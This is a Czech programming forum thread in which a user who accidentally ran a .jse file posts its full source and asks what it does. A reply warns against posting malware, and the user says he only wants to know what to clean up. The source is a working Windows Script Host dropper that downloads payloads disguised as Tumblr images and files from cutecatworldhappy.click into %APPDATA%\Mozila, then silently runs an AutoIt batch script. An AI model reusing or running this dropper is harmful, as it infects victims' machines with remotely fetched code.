Ahoj, chtěl bych se zeptat co dělá tenhle kód:
http://pastebin.com/KwBgAgZw
předem děkuji.
TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
(function(c) {
function a(a, b, pos) {
if (!b || !a) return null;
var d = WScript.CreateObject("Msxml2.XMLhttp");
d.onreadystatechange = function() {
if (d.readyState === 4 && d.status === 200) {
xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(d.ResponseBody);
xa.position = pos;
stm2 = new ActiveXObject("ADODB.Stream");
stm2.type = 1;
stm2.open();
stm2.write(xa.read());
stm2.saveToFile(b, 2);
stm2.close();
xa.close();
}
}
d.open("GET", a, false);
d.send(null);
}
function ekle(ustdosya,altdosya){{xa=new ActiveXObject("ADODB.Stream");xa.open();xa.type=1;xa.LoadFromFile(ustdosya);ix=new ActiveXObject("ADODB.Stream");ix.open();ix.type=1;ix.LoadFromFile(altdosya);stm2=new ActiveXObject("ADODB.Stream");stm2.type=1;stm2.open();stm2.write(ix.read());stm2.write(xa.read());xa.close();ix.close();stm2.saveToFile(ustdosya,2);stm2.close();}}
fso = new ActiveXObject("Scripting.FileSystemObject");
var e = new ActiveXObject("WScript.Shell");
c = new ActiveXObject("Shell.Application" );
FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");
mozklasor = FileDestr+"Mozila";
if(!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); }
c.ShellExecute("https://goo.gl/hMyuQd");
sabittumb='.media.tumblr.com/47d1cf240d5a2bf213839fa3bb61f31a/tumblr_nw';
a("https://36"+sabittumb+"9rw6Wltk1ui8al4o1_400.jpg", mozklasor+"\\Autoit.exe",10206);
a("http://cutecatworldhappy.click/denes/bg.html", mozklasor+"\\bg.html",0);
a("https://40"+sabittumb+"9s9iWADO1ui8al4o1_400.jpg", mozklasor+"\\ekl.au3",10206);
a("https://41"+sabittumb+"9sbe1LSS1ui8al4o1_400.jpg", mozklasor+"\\ff.zip",10206);
a("https://41"+sabittumb+"bz24iPSF1ui8al4o1_400.jpg", mozklasor+"\\force.au3",10206);
a("https://40"+sabittumb+"9sgiNQ9p1ui8al4o1_400.jpg", mozklasor+"\\reg.au3",10206);
a("https://40"+sabittumb+"9siiCxmJ1ui8al4o1_400.jpg", mozklasor+"\\sabit.au3",10206);
a("http://cutecatworldhappy.click/denes/manifest.jpg", mozklasor+"\\manifest.json",0);
a("https://41"+sabittumb+"gqfrSz821ui8al4o1_400.jpg", mozklasor+"\\run.bat",10206);
a("http://cutecatworldhappy.click/denes/up.jpg", mozklasor+"\\up.au3",0);
ekle(mozklasor+"\\force.au3" , mozklasor+"\\sabit.au3");
ekle(mozklasor+"\\reg.au3" , mozklasor+"\\sabit.au3");
ekle(mozklasor+"\\ekl.au3" , mozklasor+"\\sabit.au3");
c.ShellExecute(mozklasor+"\\run.bat", "", mozklasor, "", 0);
//c.ShellExecute(mozklasor+"\\Autoit.exe", '"' + mozklasor+"\\ekl.au3" + '"', "", "", 0);
})(this);#9 Ahert
Není vůbec rozumné veřejně vystavovat malware, i když jen ve formě zdrojového kódu. Normální uživatelé to k ničemu nepotřebují a zajímá to jen škodiče.
Soubory s příponami exe a bat jsou pro mne pouze soubory s příponami exe a bat. Nic víc. Některým uživatelům však mohou způsobit problémy. Proč jim chceš škodit?
Nechci nikomu škodit, píšu, že jsem omylem (svojí nepozorností/blbostí) otevřel soubor s tímto zdrojovým kódem - když jsem si pozdě všiml, že to má koncovku .jse tak jsem se podíval na zdroják a našel jsem tohle. Vytvořilo mi to složku v appdata s názvem Mozila a několika soubory uvnitř. Tu složku jsem smazal, soubor taky, ale zajímá mě jestli to dělá ještě něco - avast bohužel prospal a neobtěžoval se vyhodit ani jednu hlášku.
Zásadně nedoporučuji nikomu toto spouštět, ale ptám se jestli mám ještě něco hledat na odstranění po mém hloupém spuštění...
Zjistit počet nových příspěvků
Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku
































© 2003–2026 Programujte.com